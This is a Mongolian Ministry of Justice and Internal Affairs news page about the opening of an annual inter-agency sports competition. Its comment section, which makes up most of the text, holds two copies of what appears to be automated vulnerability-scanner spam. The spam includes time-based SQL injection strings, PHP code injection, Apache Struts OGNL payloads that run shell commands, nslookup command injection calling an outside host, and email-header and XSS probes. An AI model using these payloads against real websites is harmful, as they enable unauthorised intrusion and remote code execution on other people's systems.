• Нүүр хуудас
  • Системүүд
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

Спортын тэмцээний нээлтийн үйл ажиллагаа боллоо

2019-04-29
Спортын тэмцээний нээлтийн үйл ажиллагаа боллоо

Хууль зүй, Дотоод хэргийн яамны харьяа агентлагуудын дунд жил бүр уламжлал болгон зохион явуулдаг спортын уралдаан тэмцээний нээлтийн үйл ажиллагаа боллоо.

Нээлтийн үйл ажиллагаанд Хууль зүй, Дотоод хэргийн яамны болон харьяа агентлагуудын удирдлагууд алба хаагчдын төлөөлөл оролцсон юм.

Энэ жилийн тэмцээнийг Дотоод хэргийн их сургуулийн түүхт 85 жилийн ой болж байгаатай холбогдуулан тус сургуулийн нэрэмжит болгон спортын дөрвөн төрлөөр зохион байгуулж байгаагаараа онцлогтой. Тэмцээн хоёр өдөр үргэлжилнэ.

e DismQ3K5'));select pg_sleep(3); --
2019-06-03 Хариулах
e -1));select pg_sleep(6); --
2019-06-03 Хариулах
e 2O2qxcT2';select pg_sleep(9); --
2019-06-03 Хариулах
e Tyzvl074');select pg_sleep(9); --
2019-06-03 Хариулах
e -1;select pg_sleep(3); --
2019-06-03 Хариулах
e -1);select pg_sleep(6); --
2019-06-03 Хариулах
e 1 waitfor delay '0:0:9' --
2019-06-03 Хариулах
e gurf9zcp'; waitfor delay '0:0:3' --
2019-06-03 Хариулах
e -1); waitfor delay '0:0:6' --
2019-06-03 Хариулах
e (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2019-06-03 Хариулах
e -1; waitfor delay '0:0:6' --
2019-06-03 Хариулах
e 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z
2019-06-03 Хариулах
e if(now()=sysdate(),sleep(3),0)
2019-06-03 Хариулах
e 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
2019-06-03 Хариулах
e -1" OR 2+47-47-1=0+0+0+1 --
2019-06-03 Хариулах
e -1" OR 3+47-47-1=0+0+0+1 --
2019-06-03 Хариулах
e -1' OR 3+911-911-1=0+0+0+1 --
2019-06-03 Хариулах
e -1' OR 2+124-124-1=0+0+0+1 or 'bwcHFlUU'='
2019-06-03 Хариулах
e -1' OR 3+124-124-1=0+0+0+1 or 'bwcHFlUU'='
2019-06-03 Хариулах
e -1 OR 3+337-337-1=0+0+0+1
2019-06-03 Хариулах
e -1' OR 2+911-911-1=0+0+0+1 --
2019-06-03 Хариулах
e -1 OR 3+968-968-1=0+0+0+1 --
2019-06-03 Хариулах
e -1 OR 2+337-337-1=0+0+0+1
2019-06-03 Хариулах
e eqGqQnlK
2019-06-03 Хариулах
e -1 OR 2+968-968-1=0+0+0+1 --
2019-06-03 Хариулах
e 1
2019-06-03 Хариулах
e 1
2019-06-03 Хариулах
e create/.
2019-06-03 Хариулах
e create
2019-06-03 Хариулах
e create
2019-06-03 Хариулах
e ${@print(md5(acunetix_wvs_security_test))}\
2019-06-03 Хариулах
e ";print(md5(acunetix_wvs_security_test));$a="
2019-06-03 Хариулах
e '"
2019-06-03 Хариулах
e ${@print(md5(acunetix_wvs_security_test))}
2019-06-03 Хариулах
e
2019-06-03 Хариулах
e ;print(md5(acunetix_wvs_security_test));
2019-06-03 Хариулах
e 1CFVBqIcclO
2019-06-03 Хариулах
e ';print(md5(acunetix_wvs_security_test));$a='
2019-06-03 Хариулах
e bxss.me
2019-06-03 Хариулах
e '),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+'://hitg6XqQa7U8Y.bxss.me/').openStream().close(),new java.lang.String('
2019-06-03 Хариулах
e )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-06-03 Хариулах
e http://bxss.me/t/fit.txt?.jpg
2019-06-03 Хариулах
e Http://bxss.me/t/fit.txt
2019-06-03 Хариулах
e HttP://bxss.me/t/xss.html?%00
2019-06-03 Хариулах
e http://hitIOkLd7riVf.bxss.me/
2019-06-03 Хариулах
e bxss.me/t/xss.html?%00
2019-06-03 Хариулах
e "+response.write(9532189*9750140)+"
2019-06-03 Хариулах
e ^(#$!@#$)(()))******
2019-06-03 Хариулах
e http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-06-03 Хариулах
e 1some_inexistent_file_with_long_name.jpg
2019-06-03 Хариулах
e response.write(9532189*9750140)
2019-06-03 Хариулах
e )
2019-06-03 Хариулах
e !(()&&!|*|*|
2019-06-03 Хариулах
e '+response.write(9532189*9750140)+'
2019-06-03 Хариулах
e ${9999779+9999534}
2019-06-03 Хариулах
e #{9999779+9999534}
2019-06-03 Хариулах
e %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup bxss.me ns1.bxss.me').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
2019-06-03 Хариулах
e bcc:063738.80-74017.80.166ae.18050.2@bxss.me
2019-06-03 Хариулах
e to@example.com> bcc:063738.80-74018.80.166ae.18050.2@bxss.me
2019-06-03 Хариулах
e &nslookup dns.ce.\063738.80-74013.80.166ae.\1.bxss.me&'\"`0&nslookup dns.ce.\063738.80-74013.80.166ae.\1.bxss.me&`'
2019-06-03 Хариулах
e set|set&set
2019-06-03 Хариулах
e $(nslookup dns.ce.\063738.80-74012.80.166ae.\1.bxss.me)
2019-06-03 Хариулах
e �'�"
2019-06-03 Хариулах
e �''�""
2019-06-03 Хариулах
e 1����%2527%2522
2019-06-03 Хариулах
e @@XBRZx
2019-06-03 Хариулах
e JyI=
2019-06-03 Хариулах
e 1'"
2019-06-03 Хариулах
e \
2019-06-03 Хариулах
Кккк kkk
2019-04-30 Хариулах
e DismQ3K5'));select pg_sleep(3); --
2019-04-30
e -1));select pg_sleep(6); --
2019-04-30
e 2O2qxcT2';select pg_sleep(9); --
2019-04-30
e Tyzvl074');select pg_sleep(9); --
2019-04-30
e -1;select pg_sleep(3); --
2019-04-30
e -1);select pg_sleep(6); --
2019-04-30
e 1 waitfor delay '0:0:9' --
2019-04-30
e gurf9zcp'; waitfor delay '0:0:3' --
2019-04-30
e -1); waitfor delay '0:0:6' --
2019-04-30
e (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2019-04-30
e -1; waitfor delay '0:0:6' --
2019-04-30
e 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z
2019-04-30
e if(now()=sysdate(),sleep(3),0)
2019-04-30
e 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
2019-04-30
e -1" OR 2+47-47-1=0+0+0+1 --
2019-04-30
e -1" OR 3+47-47-1=0+0+0+1 --
2019-04-30
e -1' OR 3+911-911-1=0+0+0+1 --
2019-04-30
e -1' OR 2+124-124-1=0+0+0+1 or 'bwcHFlUU'='
2019-04-30
e -1' OR 3+124-124-1=0+0+0+1 or 'bwcHFlUU'='
2019-04-30
e -1 OR 3+337-337-1=0+0+0+1
2019-04-30
e -1' OR 2+911-911-1=0+0+0+1 --
2019-04-30
e -1 OR 3+968-968-1=0+0+0+1 --
2019-04-30
e -1 OR 2+337-337-1=0+0+0+1
2019-04-30
e eqGqQnlK
2019-04-30
e -1 OR 2+968-968-1=0+0+0+1 --
2019-04-30
e 1
2019-04-30
e 1
2019-04-30
e create/.
2019-04-30
e create
2019-04-30
e create
2019-04-30
e ${@print(md5(acunetix_wvs_security_test))}\
2019-04-30
e ";print(md5(acunetix_wvs_security_test));$a="
2019-04-30
e '"
2019-04-30
e ${@print(md5(acunetix_wvs_security_test))}
2019-04-30
e
2019-04-30
e ;print(md5(acunetix_wvs_security_test));
2019-04-30
e 1CFVBqIcclO
2019-04-30
e ';print(md5(acunetix_wvs_security_test));$a='
2019-04-30
e bxss.me
2019-04-30
e '),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+'://hitg6XqQa7U8Y.bxss.me/').openStream().close(),new java.lang.String('
2019-04-30
e )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
2019-04-30
e http://bxss.me/t/fit.txt?.jpg
2019-04-30
e Http://bxss.me/t/fit.txt
2019-04-30
e HttP://bxss.me/t/xss.html?%00
2019-04-30
e http://hitIOkLd7riVf.bxss.me/
2019-04-30
e bxss.me/t/xss.html?%00
2019-04-30
e "+response.write(9532189*9750140)+"
2019-04-30
e ^(#$!@#$)(()))******
2019-04-30
e http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
2019-04-30
e 1some_inexistent_file_with_long_name.jpg
2019-04-30
e response.write(9532189*9750140)
2019-04-30
e )
2019-04-30
e !(()&&!|*|*|
2019-04-30
e '+response.write(9532189*9750140)+'
2019-04-30
e ${9999779+9999534}
2019-04-30
e #{9999779+9999534}
2019-04-30
e %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup bxss.me ns1.bxss.me').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
2019-04-30
e bcc:063738.80-74017.80.166ae.18050.2@bxss.me
2019-04-30
e to@example.com> bcc:063738.80-74018.80.166ae.18050.2@bxss.me
2019-04-30
e &nslookup dns.ce.\063738.80-74013.80.166ae.\1.bxss.me&'\"`0&nslookup dns.ce.\063738.80-74013.80.166ae.\1.bxss.me&`'
2019-04-30
e set|set&set
2019-04-30
e $(nslookup dns.ce.\063738.80-74012.80.166ae.\1.bxss.me)
2019-04-30
e �'�"
2019-04-30
e �''�""
2019-04-30
e 1����%2527%2522
2019-04-30
e @@XBRZx
2019-04-30
e JyI=
2019-04-30
e 1'"
2019-04-30
e \
2019-04-30